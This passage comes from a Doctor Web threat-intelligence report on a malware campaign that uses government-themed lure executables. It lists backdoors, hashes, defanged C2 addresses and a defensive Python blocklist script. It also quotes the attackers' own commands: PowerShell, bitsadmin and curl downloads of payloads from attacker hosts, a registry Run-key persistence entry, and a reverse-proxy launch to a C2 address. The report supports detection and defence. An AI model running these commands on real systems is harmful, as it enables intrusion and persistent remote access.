            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;baab225a50502a156222fcc234a87c09bc2b1647&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;93000d43d5c54b07b52efbdad3012e232bdb49cc&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This backdoor executes tasks received from the attackers and is controlled via a Telegram bot. The main functionality of this malware is located in the PowerShell code hidden in its body.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.Siggen2.5463&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;The payload&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c96beb026dc871256e86eca01e1f5ba2247a0df6&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;PowerShell.BackDoor.108&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This backdoor allows malicious actors to remotely connect to infected computers via a reverse shell to execute various commands.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.RShell.169&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;633885f16ef1e848a2e057169ab45d363f3f8c57&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This backdoor enables a reverse shell and gives threat actors remote access to the system.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.ReverseShell.10&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;к проектам.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;dd98dcf6807a7281e102307d61c71b7954b93032&lt;/td&gt;
            &lt;td&gt;195[.]2.78[.]133&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td style="text-align:start;"&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 20.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 12.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
            &lt;/td&gt;
            &lt;td&gt;f546861adc7c8ca88e3b302d274e6fffb63de9b0&lt;/td&gt;
            &lt;td&gt;62[.]113.114[.]209&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;The next infection stages&lt;/h3&gt;
&lt;p&gt;The following malicious programs can be installed on a device once the first stage has compromised it:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Inject5.57968&amp;lng=en"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.2&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseProxy.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49862&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This is a trojan app with a backdoor encrypted in its body. The backdoor lets the attackers download further malicious programs onto the infected computer. The payload is decrypted in several stages; in one of them, the malicious data is injected into a process of &lt;span class="string"&gt;aspnet_compiler.exe&lt;/span&gt;, a legitimate compiler that ships with the Microsoft .NET Framework. The fully decrypted backdoor ends up running in the context of this legitimate program’s process, so its activity appears to come from a trusted Microsoft binary.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Studying &lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;’s activity, using the “sandbox” of the Dr.Web vxCube interactive threat analyzer&lt;/em&gt;&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for Trojan.Inject5.57968&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;The payload&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;pickmum1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e840c521ec436915da71eb9b0cfd56990f4e53e5&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;mummyfile1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;22641dea0dbe58e71f93615c208610f79d661228&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;A backdoor that is controlled via a Telegram bot and executes the attackers’ commands.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.ShellNET.2&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;win.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;1957fb36537df5d1a29fb7383bc7cde00cd88c77&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;A backdoor based on the open-source ReverseSocks5 tool. It runs a reverse SOCKS5 proxy: the infected host connects out to the operators’ server, which then exposes a SOCKS5 endpoint through which the attackers tunnel their own traffic into the victim’s network via the compromised machine. &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt; is launched via the command interpreter cmd.exe with the parameter &lt;span class="string"&gt;-connect IP&lt;/span&gt;, which names the server to connect to. There are modifications of this backdoor with hardcoded addresses.&lt;/p&gt;
&lt;p&gt;The following IPs have been detected:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;78[.]128.112[.]209&lt;/span&gt; (specified in the launching command)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;96[.]9.125[.]168&lt;/span&gt; (specified in the launching command)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;188[.]127.231[.]136&lt;/span&gt; (hardcoded in the code)&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;revv2.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;6ec8a10a71518563e012f4d24499b12586128c55&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt; is the detection name for trojanized versions of legitimate programs into which the attackers have implanted malicious code. Doctor Web’s malware analysts encountered malicious modifications of the WinRAR and 7-Zip archivers, the Visual Studio Code development tool, the AkelPad text editor, and some other apps. Among them, for instance, was the Sumatra PDF reader, which the cybercriminals passed off as the MAX messenger. Such modifications have lost their original functionality: when launched, they do nothing but initialize the implanted trojan component.&lt;/p&gt;
&lt;p&gt;Depending on the cybercriminals’ goals, these modifications can carry all sorts of malware. Among them are:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseProxy.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt; (&lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt; (&lt;a href="https://github.com/HavocFramework/Havoc" target="_blank"&gt;Havoc&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt; (CobaltStrike)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt; (AsyncRAT)&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Clipper.808&amp;lng=en"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for Trojan.Packed2.49862&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;The payload&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;rev2.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;8279ad4a8ad20bf7bbca0fc54428d6cdc136b776&lt;/td&gt;
            &lt;td&gt;188[.]127.231[.]136&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;revv.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a2326011368d994e99509388cb3dc132d7c2053f&lt;/td&gt;
            &lt;td&gt;192[.]168.11[.]10&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7zr.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winload.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;451cfa10538bc572d9fd3d09758eb945ac1b9437&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Command line RAR&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winlock.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;winsrv.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;firefox.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;bbe3a5ef79e996d9411c8320b879c5e31369921e&lt;/td&gt;
            &lt;td&gt;94[.]198.52[.]210&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;AkelPad.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e8ab26b3141fbb410522b2cbabdc7e00a9a55251&lt;/td&gt;
            &lt;td&gt;78[.]128.112[.]209&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;dcd374105a5542ef5100f6034c805878153b1205&lt;/td&gt;
            &lt;td&gt;192[.]168.88[.]104&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e51a65f50b8bb3abf1b7f2f9217a24acfb3de618&lt;/td&gt;
            &lt;td&gt;192[.]168.1[.]157&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;chromedriver.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4&lt;/td&gt;
            &lt;td&gt;Telegram bot&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;svc_host.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;dzveo09ww.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81&lt;/td&gt;
            &lt;td&gt;Telegram bot&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5&lt;/td&gt;
            &lt;td&gt;Telegram bot&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;max - для бизнеса.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 &lt;/td&gt;
            &lt;td&gt;89[.]22.161[.]133&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
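&lt;p&gt;The tables above list C2 addresses and URLs in defanged form (&lt;span class="string"&gt;[.]&lt;/span&gt; inside addresses, &lt;span class="string"&gt;hxxp[:]//&lt;/span&gt; in URLs), and several rows carry 192.168.x.x addresses. Those are RFC 1918 private space: they are not routable and cannot be live Internet C2 servers, and most likely reflect the attackers’ test builds, so they do not belong in a perimeter blocklist. The Python script below is an added example, not code from the Doctor Web report or from the group’s toolset: it refangs indicators of the kind shown in these tables and in the commands quoted further down, classifies them, and builds a host blocklist that drops private addresses. The indicator values are copied from the report; the list, the function names and the output format are this example’s own.&lt;/p&gt;

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed input for this example: network indicators copied from the
# report's tables and quoted commands, in the defanged form the report uses
# ("[.]" inside addresses, "hxxp[:]//" in URLs). "Telegram bot" is the
# report's placeholder for C2 over the Telegram API and has no host to block.
DEFANGED_IOCS = [
    "109[.]172.85[.]63",
    "195[.]2.78[.]133",
    "64[.]95.11[.]202",
    "192[.]168.11[.]10",
    "192[.]168.88[.]104",
    "hxxps[:]//sss[.]qwadx[.]com/revv3.exe",
    "hxxp[:]//195[.]2.79[.]245/rever.exe",
    "Telegram bot",
]


def refang(indicator):
    """Undo the report's defanging so the value is usable in tooling."""
    value = indicator.strip()
    value = value.replace("[.]", ".").replace("[:]", ":")
    # hxxp / hxxps prefix back to http / https
    return re.sub(r"^hxxp(s?)", r"http\1", value, flags=re.IGNORECASE)


def classify(indicator):
    """Return (refanged_value, kind); kind is 'public-ip', 'private-ip',
    'url' or 'other'. Private covers RFC 1918, loopback and reserved space."""
    value = refang(indicator)
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        ip = None
    if ip is not None:
        if ip.is_private or ip.is_loopback or ip.is_reserved:
            return value, "private-ip"
        return value, "public-ip"
    if value.lower().startswith(("http://", "https://")):
        return value, "url"
    return value, "other"


def blocklist(indicators):
    """Build a de-duplicated, sorted host blocklist from mixed indicators.

    Public IPs are kept as they are; URLs contribute their host. Anything in
    private address space is dropped: the 192.168.x.x C2 addresses in the
    report's tables are not routable and would only produce false positives
    if hunted for or blocked in a real network.
    """
    hosts = set()
    for item in indicators:
        value, kind = classify(item)
        if kind == "public-ip":
            hosts.add(value)
        elif kind == "url":
            host = urlsplit(value).hostname
            if host and classify(host)[1] != "private-ip":
                hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    for ioc in DEFANGED_IOCS:
        print("%-42s %s" % classify(ioc))
    print("blocklist:", blocklist(DEFANGED_IOCS))
```

&lt;p&gt;Hashes from the tables are matched on the endpoint rather than at the perimeter, so they are deliberately left out of the blocklist; the IOC repository linked at the end of the article carries the full machine-readable set.&lt;/p&gt;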
&lt;h3&gt;Typical actions performed by this group in a compromised network&lt;/h3&gt;
&lt;p&gt;Once the attackers have penetrated the target organization’s infrastructure, they collect information about the host and its network and establish persistence.&lt;/p&gt;
&lt;p&gt;To collect information about the infected computer, they execute these commands:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;whoami&lt;/span&gt; — to get information about the current user;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\&amp;lt;user&amp;gt;\\Downloads&lt;/span&gt; — to get the list of files located in the “Downloads” directory of the current user;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\public\\pictures\\&lt;/span&gt; — to get the list of files in the “Pictures” directory from a shared catalog (in order to determine which malicious programs have already been downloaded into the system);&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;ipconfig /all&lt;/span&gt; — to get the network configuration;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;net user&lt;/span&gt; — to get a list of all of the users in the system.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;They use the following commands to discover the system’s proxy settings and check outbound connectivity:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com")'&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com -x &amp;lt;proxy&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;To configure the network, they use:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;the built-in Windows command-line tool &lt;span class="string"&gt;netsh&lt;/span&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;To download further malicious tools onto the system, they rely on legitimate built-in utilities:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;PowerShell (for example: &lt;span class="string"&gt;powershell -Command Invoke-WebRequest -Uri "hxxps[:]//sss[.]qwadx[.]com/revv3.exe" -OutFile "C:\users\public\pictures\rev.exe"&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;Bitsadmin (for example: &lt;span class="string"&gt;bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\users\public\pictures\rev3.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;curl (for example: &lt;span class="string"&gt;curl -o C:\users\public\pictures\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe&lt;/span&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;For persistence:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;They add a Run key to the Windows registry so that their tool starts at every logon of the current user (for example: &lt;span class="string"&gt;REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\users\public\pictures\win.exe /f&lt;/span&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;They launch their tools via the command-line interpreter cmd.exe. For example:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\users\public\libraries\revv2.exe -connect 78[.]128.112[.]209:10443&lt;/span&gt; — to launch &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\users\public\pictures\732.exe&lt;/span&gt; — to launch &lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;They can use PowerShell to delete their tools. For example:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Threat actors can also periodically check whether C2 servers are available, using the command &lt;span class="string"&gt;ping&lt;/span&gt;.&lt;/p&gt;
